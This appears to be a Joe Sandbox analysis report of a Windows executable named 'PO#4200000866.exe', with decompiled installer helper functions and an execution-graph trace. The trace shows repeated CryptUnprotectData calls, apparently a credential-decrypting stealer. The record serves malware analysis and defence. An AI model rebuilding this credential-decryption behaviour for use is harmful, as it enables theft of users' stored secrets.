                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsdFF63.tmp
                                                                                      • API String ID: 2962429428-3159224888
                                                                                      • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                      • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                                      • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                      • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 89%
                                                                                      			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                      				int _t15;
                                                                                      				long _t16;
                                                                                      
                                                                                      				_t15 = _a8;
                                                                                      				if(_t15 != 0x102) {
                                                                                      					if(_t15 != 0x200) {
                                                                                      						_t16 = _a16;
                                                                                      						L7:
                                                                                      						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                                                                                      							_push(_t16);
                                                                                      							_push(6);
                                                                                      							 *0x423734 = _t16;
                                                                                      							E00404FFF();
                                                                                      						}
                                                                                      						L11:
                                                                                      						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                                                                                      					}
                                                                                      					if(IsWindowVisible(_a4) == 0) {
                                                                                      						L10:
                                                                                      						_t16 = _a16;
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					_t16 = E00404F7F(_a4, 1);
                                                                                      					_t15 = 0x419;
                                                                                      					goto L7;
                                                                                      				}
                                                                                      				if(_a12 != 0x20) {
                                                                                      					goto L10;
                                                                                      				}
                                                                                      				E00404610(0x413);
                                                                                      				return 0;
                                                                                      			}





                                                                                      0x00405642
                                                                                      0x0040564c
                                                                                      0x00405668
                                                                                      0x0040568a
                                                                                      0x0040568d
                                                                                      0x00405693
                                                                                      0x0040569d
                                                                                      0x0040569e
                                                                                      0x004056a0
                                                                                      0x004056a6
                                                                                      0x004056a6
                                                                                      0x004056b0
                                                                                      0x00000000
                                                                                      0x004056be
                                                                                      0x00405675
                                                                                      0x004056ad
                                                                                      0x004056ad
                                                                                      0x00000000
                                                                                      0x004056ad
                                                                                      0x00405681
                                                                                      0x00405683
                                                                                      0x00000000
                                                                                      0x00405683
                                                                                      0x00405652
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405659
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 0040566D
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                                        • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                      • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                                      • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                      • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 77%
                                                                                      			E00405F83(WCHAR* _a4) {
                                                                                      				WCHAR* _t5;
                                                                                      				WCHAR* _t7;
                                                                                      
                                                                                      				_t7 = _a4;
                                                                                      				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                                      				while( *_t5 != 0x5c) {
                                                                                      					_push(_t5);
                                                                                      					_push(_t7);
                                                                                      					_t5 = CharPrevW();
                                                                                      					if(_t5 > _t7) {
                                                                                      						continue;
                                                                                      					}
                                                                                      					break;
                                                                                      				}
                                                                                      				 *_t5 =  *_t5 & 0x00000000;
                                                                                      				return  &(_t5[1]);
                                                                                      			}





                                                                                      0x00405f84
                                                                                      0x00405f8e
                                                                                      0x00405f91
                                                                                      0x00405f97
                                                                                      0x00405f98
                                                                                      0x00405f99
                                                                                      0x00405fa1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405fa1
                                                                                      0x00405fa3
                                                                                      0x00405fab

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO#4200000866.exe,C:\Users\user\Desktop\PO#4200000866.exe,80000000,00000003), ref: 00405F89
                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO#4200000866.exe,C:\Users\user\Desktop\PO#4200000866.exe,80000000,00000003), ref: 00405F99
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrlen
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 2709904686-3370423016
                                                                                      • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                      • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                                                      • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                      • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                      				int _v8;
                                                                                      				int _t12;
                                                                                      				int _t14;
                                                                                      				int _t15;
                                                                                      				CHAR* _t17;
                                                                                      				CHAR* _t27;
                                                                                      
                                                                                      				_t12 = lstrlenA(_a8);
                                                                                      				_t27 = _a4;
                                                                                      				_v8 = _t12;
                                                                                      				while(lstrlenA(_t27) >= _v8) {
                                                                                      					_t14 = _v8;
                                                                                      					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                      					_t15 = lstrcmpiA(_t27, _a8);
                                                                                      					_t27[_v8] =  *(_t14 + _t27);
                                                                                      					if(_t15 == 0) {
                                                                                      						_t17 = _t27;
                                                                                      					} else {
                                                                                      						_t27 = CharNextA(_t27);
                                                                                      						continue;
                                                                                      					}
                                                                                      					L5:
                                                                                      					return _t17;
                                                                                      				}
                                                                                      				_t17 = 0;
                                                                                      				goto L5;
                                                                                      			}









                                                                                      0x004060cd
                                                                                      0x004060cf
                                                                                      0x004060d2
                                                                                      0x004060fe
                                                                                      0x004060d7
                                                                                      0x004060e0
                                                                                      0x004060e5
                                                                                      0x004060f0
                                                                                      0x004060f3
                                                                                      0x0040610f
                                                                                      0x004060f5
                                                                                      0x004060fc
                                                                                      0x00000000
                                                                                      0x004060fc
                                                                                      0x00406108
                                                                                      0x0040610c
                                                                                      0x0040610c
                                                                                      0x00406106
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
                                                                                      • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                      • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                                      • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                      • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:20.8%
                                                                                      Dynamic/Decrypted Code Coverage:99.5%
                                                                                      Signature Coverage:1.9%
                                                                                      Total number of Nodes:424
                                                                                      Total number of Limit Nodes:15
                                                                                      execution_graph 34724 104efc0 34726 104efd1 34724->34726 34725 104efd6 34726->34725 34727 104f427 LdrInitializeThunk 34726->34727 34728 104f443 34727->34728 34731 1d6b0c50 34732 1d6b0c5d 34731->34732 34735 1d6bce23 34732->34735 34733 1d6b0c6f 34736 1d6bce50 34735->34736 34740 1d6bd4c8 34736->34740 34745 1d6bd4b8 34736->34745 34737 1d6bcec3 34737->34733 34744 1d6bd4d1 34740->34744 34741 1d6bd5cd 34741->34737 34744->34741 34750 1d6bd5d9 34744->34750 34794 1d6bd5e8 34744->34794 34747 1d6bd4d1 34745->34747 34746 1d6bd5cd 34746->34737 34747->34746 34748 1d6bd5d9 40 API calls 34747->34748 34749 1d6bd5e8 40 API calls 34747->34749 34748->34747 34749->34747 34751 1d6bd5e8 34750->34751 34752 1d6bd62f 34751->34752 34838 1d6be36b 34751->34838 34848 1d6bed9f 34751->34848 34852 1d6be61f 34751->34852 34859 1d6be99f 34751->34859 34863 1d6beb99 34751->34863 34867 1d6be59a 34751->34867 34874 1d6be91a 34751->34874 34878 1d6beb05 34751->34878 34882 1d6be487 34751->34882 34889 1d6be50c 34751->34889 34896 1d6be88c 34751->34896 34900 1d6bda08 34751->34900 34905 1d6bed0b 34751->34905 34909 1d6be3b2 34751->34909 34919 1d6be73b 34751->34919 34923 1d6beabb 34751->34923 34927 1d6bec2d 34751->34927 34931 1d6be6ad 34751->34931 34935 1d6bea2d 34751->34935 34939 1d6bed55 34751->34939 34943 1d6be553 34751->34943 34950 1d6be8d3 34751->34950 34954 1d6be5d8 34751->34954 34961 1d6be4c5 34751->34961 34968 1d6be845 34751->34968 34972 1d6be7c0 34751->34972 34976 1d6be440 34751->34976 34983 1d6becc1 34751->34983 34987 1d6beb4f 34751->34987 34991 1d6be34a 34751->34991 35001 1d6be6f4 34751->35001 35005 1d6bea74 34751->35005 35009 1d6bec77 34751->35009 35013 1d6be7fe 34751->35013 35017 1d6bd9f8 34751->35017 35022 1d6be3f9 34751->35022 35032 1d6be779 34751->35032 35036 1d6be666 34751->35036 35040 1d6be9e6 34751->35040 35044 1d6be961 34751->35044 35048 1d6bebe3 34751->35048 34795 1d6bd607 34794->34795 34796 1d6bd62f 34795->34796 34797 1d6be36b 2 API calls 34795->34797 34798 1d6bebe3 KiUserExceptionDispatcher 34795->34798 34799 1d6be961 KiUserExceptionDispatcher 34795->34799 34800 1d6be9e6 KiUserExceptionDispatcher 34795->34800 34801 1d6be666 KiUserExceptionDispatcher 34795->34801 34802 1d6be779 KiUserExceptionDispatcher 34795->34802 34803 1d6be3f9 2 API calls 34795->34803 34804 1d6bd9f8 CryptUnprotectData 34795->34804 34805 1d6be7fe KiUserExceptionDispatcher 34795->34805 34806 1d6bec77 KiUserExceptionDispatcher 34795->34806 34807 1d6bea74 KiUserExceptionDispatcher 34795->34807 34808 1d6be6f4 KiUserExceptionDispatcher 34795->34808 34809 1d6be34a 2 API calls 34795->34809 34810 1d6beb4f KiUserExceptionDispatcher 34795->34810 34811 1d6becc1 KiUserExceptionDispatcher 34795->34811 34812 1d6be440 2 API calls 34795->34812 34813 1d6be7c0 KiUserExceptionDispatcher 34795->34813 34814 1d6be845 KiUserExceptionDispatcher 34795->34814 34815 1d6be4c5 2 API calls 34795->34815 34816 1d6be5d8 2 API calls 34795->34816 34817 1d6be8d3 KiUserExceptionDispatcher 34795->34817 34818 1d6be553 2 API calls 34795->34818 34819 1d6bed55 KiUserExceptionDispatcher 34795->34819 34820 1d6bea2d KiUserExceptionDispatcher 34795->34820 34821 1d6be6ad KiUserExceptionDispatcher 34795->34821 34822 1d6bec2d KiUserExceptionDispatcher 34795->34822 34823 1d6beabb KiUserExceptionDispatcher 34795->34823 34824 1d6be73b KiUserExceptionDispatcher 34795->34824 34825 1d6be3b2 2 API calls 34795->34825 34826 1d6bed0b KiUserExceptionDispatcher 34795->34826 34827 1d6bda08 CryptUnprotectData 34795->34827 34828 1d6be88c KiUserExceptionDispatcher 34795->34828 34829 1d6be50c 2 API calls 34795->34829 34830 1d6be487 2 API calls 34795->34830 34831 1d6beb05 KiUserExceptionDispatcher 34795->34831 34832 1d6be91a KiUserExceptionDispatcher 34795->34832 34833 1d6be59a 2 API calls 34795->34833 34834 1d6beb99 KiUserExceptionDispatcher 34795->34834 34835 1d6be99f KiUserExceptionDispatcher 34795->34835 34836 1d6be61f 2 API calls 34795->34836 34837 1d6bed9f KiUserExceptionDispatcher 34795->34837 34797->34796 34798->34796 34799->34796 34800->34796 34801->34796 34802->34796 34803->34796 34804->34796 34805->34796 34806->34796 34807->34796 34808->34796 34809->34796 34810->34796 34811->34796 34812->34796 34813->34796 34814->34796 34815->34796 34816->34796 34817->34796 34818->34796 34819->34796 34820->34796 34821->34796 34822->34796 34823->34796 34824->34796 34825->34796 34826->34796 34827->34796 34828->34796 34829->34796 34830->34796 34831->34796 34832->34796 34833->34796 34834->34796 34835->34796 34836->34796 34837->34796 34839 1d6be37d 34838->34839 35052 104de28 34839->35052 35059 104dd7a 34839->35059 34840 1d6be425 35068 2080c380 34840->35068 35076 2080c3e0 34840->35076 34841 1d6be64b 34842 1d6bedc8 KiUserExceptionDispatcher 34841->34842 34843 1d6bede4 34842->34843 34843->34752 34849 1d6bedb1 KiUserExceptionDispatcher 34848->34849 34851 1d6bede4 34849->34851 34851->34752 34853 1d6be631 34852->34853 34857 2080c380 CryptUnprotectData 34853->34857 34858 2080c3e0 CryptUnprotectData 34853->34858 34854 1d6be64b 34855 1d6bedc8 KiUserExceptionDispatcher 34854->34855 34856 1d6bede4 34855->34856 34856->34752 34857->34854 34858->34854 34860 1d6be9b1 KiUserExceptionDispatcher 34859->34860 34862 1d6bede4 34860->34862 34862->34752 34864 1d6bebab KiUserExceptionDispatcher 34863->34864 34866 1d6bede4 34864->34866 34866->34752 34868 1d6be5ac 34867->34868 34872 2080c380 CryptUnprotectData 34868->34872 34873 2080c3e0 CryptUnprotectData 34868->34873 34869 1d6be64b 34870 1d6bedc8 KiUserExceptionDispatcher 34869->34870 34871 1d6bede4 34870->34871 34871->34752 34872->34869 34873->34869 34875 1d6be92c KiUserExceptionDispatcher 34874->34875 34877 1d6bede4 34875->34877 34877->34752 34879 1d6beb17 KiUserExceptionDispatcher 34878->34879 34881 1d6bede4 34879->34881 34881->34752 34883 1d6be499 34882->34883 34887 2080c380 CryptUnprotectData 34883->34887 34888 2080c3e0 CryptUnprotectData 34883->34888 34884 1d6be64b 34885 1d6bedc8 KiUserExceptionDispatcher 34884->34885 34886 1d6bede4 34885->34886 34886->34752 34887->34884 34888->34884 34890 1d6be51e 34889->34890 34894 2080c380 CryptUnprotectData 34890->34894 34895 2080c3e0 CryptUnprotectData 34890->34895 34891 1d6be64b 34892 1d6bedc8 KiUserExceptionDispatcher 34891->34892 34893 1d6bede4 34892->34893 34893->34752 34894->34891 34895->34891 34897 1d6be89e KiUserExceptionDispatcher 34896->34897 34899 1d6bede4 34897->34899 34899->34752 34901 1d6bda2d 34900->34901 34902 1d6be312 34901->34902 35227 104b108 34901->35227 35232 104b0f8 34901->35232 34906 1d6bed1d KiUserExceptionDispatcher 34905->34906 34908 1d6bede4 34906->34908 34908->34752 34910 1d6be3c4 34909->34910 34917 104de28 CryptUnprotectData 34910->34917 34918 104dd7a CryptUnprotectData 34910->34918 34911 1d6be425 34915 2080c380 CryptUnprotectData 34911->34915 34916 2080c3e0 CryptUnprotectData 34911->34916 34912 1d6be64b 34913 1d6bedc8 KiUserExceptionDispatcher 34912->34913 34914 1d6bede4 34913->34914 34914->34752 34915->34912 34916->34912 34917->34911 34918->34911 34920 1d6be74d 34919->34920 34921 1d6bedc8 KiUserExceptionDispatcher 34920->34921 34922 1d6bede4 34921->34922 34922->34752 34924 1d6beacd KiUserExceptionDispatcher 34923->34924 34926 1d6bede4 34924->34926 34926->34752 34928 1d6bec3f KiUserExceptionDispatcher 34927->34928 34930 1d6bede4 34928->34930 34930->34752 34932 1d6be6bf 34931->34932 34933 1d6bedc8 KiUserExceptionDispatcher 34932->34933 34934 1d6bede4 34933->34934 34934->34752 34936 1d6bea3f KiUserExceptionDispatcher 34935->34936 34938 1d6bede4 34936->34938 34938->34752 34940 1d6bed67 KiUserExceptionDispatcher 34939->34940 34942 1d6bede4 34940->34942 34942->34752 34944 1d6be565 34943->34944 34948 2080c380 CryptUnprotectData 34944->34948 34949 2080c3e0 CryptUnprotectData 34944->34949 34945 1d6be64b 34946 1d6bedc8 KiUserExceptionDispatcher 34945->34946 34947 1d6bede4 34946->34947 34947->34752 34948->34945 34949->34945 34951 1d6be8e5 KiUserExceptionDispatcher 34950->34951 34953 1d6bede4 34951->34953 34953->34752 34955 1d6be5ea 34954->34955 34959 2080c380 CryptUnprotectData 34955->34959 34960 2080c3e0 CryptUnprotectData 34955->34960 34956 1d6be64b 34957 1d6bedc8 KiUserExceptionDispatcher 34956->34957 34958 1d6bede4 34957->34958 34958->34752 34959->34956 34960->34956 34962 1d6be4d7 34961->34962 34966 2080c380 CryptUnprotectData 34962->34966 34967 2080c3e0 CryptUnprotectData 34962->34967 34963 1d6be64b 34964 1d6bedc8 KiUserExceptionDispatcher 34963->34964 34965 1d6bede4 34964->34965 34965->34752 34966->34963 34967->34963 34969 1d6be857 KiUserExceptionDispatcher 34968->34969 34971 1d6bede4 34969->34971 34971->34752 34973 1d6be7d2 34972->34973 34974 1d6bedc8 KiUserExceptionDispatcher 34973->34974 34975 1d6bede4 34974->34975 34975->34752 34977 1d6be452 34976->34977 34981 2080c380 CryptUnprotectData 34977->34981 34982 2080c3e0 CryptUnprotectData 34977->34982 34978 1d6be64b 34979 1d6bedc8 KiUserExceptionDispatcher 34978->34979 34980 1d6bede4 34979->34980 34980->34752 34981->34978 34982->34978 34984 1d6becd3 KiUserExceptionDispatcher 34983->34984 34986 1d6bede4 34984->34986 34986->34752 34988 1d6beb61 KiUserExceptionDispatcher 34987->34988 34990 1d6bede4 34988->34990 34990->34752 34992 1d6be350 34991->34992 34999 104de28 CryptUnprotectData 34992->34999 35000 104dd7a CryptUnprotectData 34992->35000 34993 1d6be425 34997 2080c380 CryptUnprotectData 34993->34997 34998 2080c3e0 CryptUnprotectData 34993->34998 34994 1d6be64b 34995 1d6bedc8 KiUserExceptionDispatcher 34994->34995 34996 1d6bede4 34995->34996 34996->34752 34997->34994 34998->34994 34999->34993 35000->34993 35002 1d6be706 35001->35002 35003 1d6bedc8 KiUserExceptionDispatcher 35002->35003 35004 1d6bede4 35003->35004 35004->34752 35006 1d6bea86 KiUserExceptionDispatcher 35005->35006 35008 1d6bede4 35006->35008 35008->34752 35010 1d6bec89 KiUserExceptionDispatcher 35009->35010 35012 1d6bede4 35010->35012 35012->34752 35014 1d6be810 KiUserExceptionDispatcher 35013->35014 35016 1d6bede4 35014->35016 35016->34752 35018 1d6bda2d 35017->35018 35019 1d6be312 35018->35019 35020 104b108 CryptUnprotectData 35018->35020 35021 104b0f8 CryptUnprotectData 35018->35021 35020->35018 35021->35018 35023 1d6be40b 35022->35023 35028 104de28 CryptUnprotectData 35023->35028 35029 104dd7a CryptUnprotectData 35023->35029 35024 1d6be425 35030 2080c380 CryptUnprotectData 35024->35030 35031 2080c3e0 CryptUnprotectData 35024->35031 35025 1d6be64b 35026 1d6bedc8 KiUserExceptionDispatcher 35025->35026 35027 1d6bede4 35026->35027 35027->34752 35028->35024 35029->35024 35030->35025 35031->35025 35033 1d6be78b 35032->35033 35034 1d6bedc8 KiUserExceptionDispatcher 35033->35034 35035 1d6bede4 35034->35035 35035->34752 35037 1d6be678 35036->35037 35038 1d6bedc8 KiUserExceptionDispatcher 35037->35038 35039 1d6bede4 35038->35039 35039->34752 35041 1d6be9f8 KiUserExceptionDispatcher 35040->35041 35043 1d6bede4 35041->35043 35043->34752 35045 1d6be973 KiUserExceptionDispatcher 35044->35045 35047 1d6bede4 35045->35047 35047->34752 35049 1d6bebf5 KiUserExceptionDispatcher 35048->35049 35051 1d6bede4 35049->35051 35051->34752 35053 104de4d 35052->35053 35083 104e9c0 35053->35083 35099 104ea75 35053->35099 35115 104e9af 35053->35115 35131 104ec00 35053->35131 35054 104de71 35054->34840 35060 104dd99 35059->35060 35062 104ddbc 35059->35062 35060->34840 35061 104dde9 35061->34840 35062->35061 35064 104ea75 CryptUnprotectData 35062->35064 35065 104e9c0 CryptUnprotectData 35062->35065 35066 104ec00 CryptUnprotectData 35062->35066 35067 104e9af CryptUnprotectData 35062->35067 35063 104de71 35063->34840 35064->35063 35065->35063 35066->35063 35067->35063 35069 2080c3a1 35068->35069 35070 2080c3c4 35068->35070 35069->34841 35183 104b5c0 35070->35183 35196 104b888 35070->35196 35205 104b66e 35070->35205 35214 104b5d0 35070->35214 35071 2080c42a 35071->34841 35077 2080c400 35076->35077 35079 104b5c0 CryptUnprotectData 35077->35079 35080 104b5d0 CryptUnprotectData 35077->35080 35081 104b66e CryptUnprotectData 35077->35081 35082 104b888 CryptUnprotectData 35077->35082 35078 2080c42a 35078->34841 35079->35078 35080->35078 35081->35078 35082->35078 35087 104e9e1 35083->35087 35084 104ec38 35084->35054 35085 104ec71 35085->35054 35086 104ec43 35086->35085 35088 104ea75 CryptUnprotectData 35086->35088 35089 104e9c0 CryptUnprotectData 35086->35089 35090 104ec00 CryptUnprotectData 35086->35090 35091 104eca1 CryptUnprotectData 35086->35091 35092 104e9af CryptUnprotectData 35086->35092 35087->35084 35087->35086 35094 104ea75 CryptUnprotectData 35087->35094 35095 104e9c0 CryptUnprotectData 35087->35095 35096 104ec00 CryptUnprotectData 35087->35096 35098 104e9af CryptUnprotectData 35087->35098 35147 104eca1 35087->35147 35156 2080920f 35087->35156 35088->35085 35089->35085 35090->35085 35091->35085 35092->35085 35094->35087 35095->35087 35096->35087 35098->35087 35101 104ea32 35099->35101 35100 104ec38 35100->35054 35101->35100 35102 104ec43 35101->35102 35104 104ea75 CryptUnprotectData 35101->35104 35105 104e9c0 CryptUnprotectData 35101->35105 35106 104ec00 CryptUnprotectData 35101->35106 35107 104eca1 CryptUnprotectData 35101->35107 35108 104e9af CryptUnprotectData 35101->35108 35114 2080920f CryptUnprotectData 35101->35114 35103 104ec71 35102->35103 35109 104ea75 CryptUnprotectData 35102->35109 35110 104e9c0 CryptUnprotectData 35102->35110 35111 104ec00 CryptUnprotectData 35102->35111 35112 104eca1 CryptUnprotectData 35102->35112 35113 104e9af CryptUnprotectData 35102->35113 35103->35054 35104->35101 35105->35101 35106->35101 35107->35101 35108->35101 35109->35103 35110->35103 35111->35103 35112->35103 35113->35103 35114->35101 35119 104e9e1 35115->35119 35116 104ec38 35116->35054 35117 104ec43 35118 104ec71 35117->35118 35125 104ea75 CryptUnprotectData 35117->35125 35126 104e9c0 CryptUnprotectData 35117->35126 35127 104ec00 CryptUnprotectData 35117->35127 35128 104eca1 CryptUnprotectData 35117->35128 35129 104e9af CryptUnprotectData 35117->35129 35118->35054 35119->35116 35119->35117 35120 104ea75 CryptUnprotectData 35119->35120 35121 104e9c0 CryptUnprotectData 35119->35121 35122 104ec00 CryptUnprotectData 35119->35122 35123 104eca1 CryptUnprotectData 35119->35123 35124 104e9af CryptUnprotectData 35119->35124 35130 2080920f CryptUnprotectData 35119->35130 35120->35119 35121->35119 35122->35119 35123->35119 35124->35119 35125->35118 35126->35118 35127->35118 35128->35118 35129->35118 35130->35119 35134 104ea32 35131->35134 35132 104ec38 35132->35054 35133 104ec71 35133->35054 35134->35132 35135 104ec43 35134->35135 35136 2080920f CryptUnprotectData 35134->35136 35137 104ea75 CryptUnprotectData 35134->35137 35138 104e9c0 CryptUnprotectData 35134->35138 35139 104ec00 CryptUnprotectData 35134->35139 35140 104eca1 CryptUnprotectData 35134->35140 35141 104e9af CryptUnprotectData 35134->35141 35135->35133 35142 104ea75 CryptUnprotectData 35135->35142 35143 104e9c0 CryptUnprotectData 35135->35143 35144 104ec00 CryptUnprotectData 35135->35144 35145 104eca1 CryptUnprotectData 35135->35145 35146 104e9af CryptUnprotectData 35135->35146 35136->35134 35137->35134 35138->35134 35139->35134 35140->35134 35141->35134 35142->35133 35143->35133 35144->35133 35145->35133 35146->35133 35148 104ecc1 35147->35148 35149 104ece4 35147->35149 35148->35087 35150 104edc9 35149->35150 35151 104ea75 CryptUnprotectData 35149->35151 35152 104e9c0 CryptUnprotectData 35149->35152 35153 104ec00 CryptUnprotectData 35149->35153 35154 104eca1 CryptUnprotectData 35149->35154 35155 104e9af CryptUnprotectData 35149->35155 35150->35087 35151->35150 35152->35150 35153->35150 35154->35150 35155->35150 35157 2080926d 35156->35157 35158 20809223 35156->35158 35157->35087 35159 208092b2 35158->35159 35162 20809890 35158->35162 35167 208098a0 35158->35167 35159->35087 35163 20809893 35162->35163 35164 20809979 35163->35164 35172 20809ee0 35163->35172 35176 20809ef0 35163->35176 35168 208098c5 35167->35168 35169 20809979 35167->35169 35168->35169 35170 20809ee0 CryptUnprotectData 35168->35170 35171 20809ef0 CryptUnprotectData 35168->35171 35170->35169 35171->35169 35173 20809f0d 35172->35173 35180 20809708 35173->35180 35177 20809f0d 35176->35177 35178 20809708 CryptUnprotectData 35177->35178 35179 20809f45 35178->35179 35179->35164 35181 2080a130 CryptUnprotectData 35180->35181 35182 20809f45 35181->35182 35182->35164 35184 104b5f0 35183->35184 35187 104b5c0 CryptUnprotectData 35183->35187 35188 104b5d0 CryptUnprotectData 35183->35188 35189 104b66e CryptUnprotectData 35183->35189 35190 104b888 CryptUnprotectData 35183->35190 35185 104b8c2 35184->35185 35186 2080920f CryptUnprotectData 35184->35186 35191 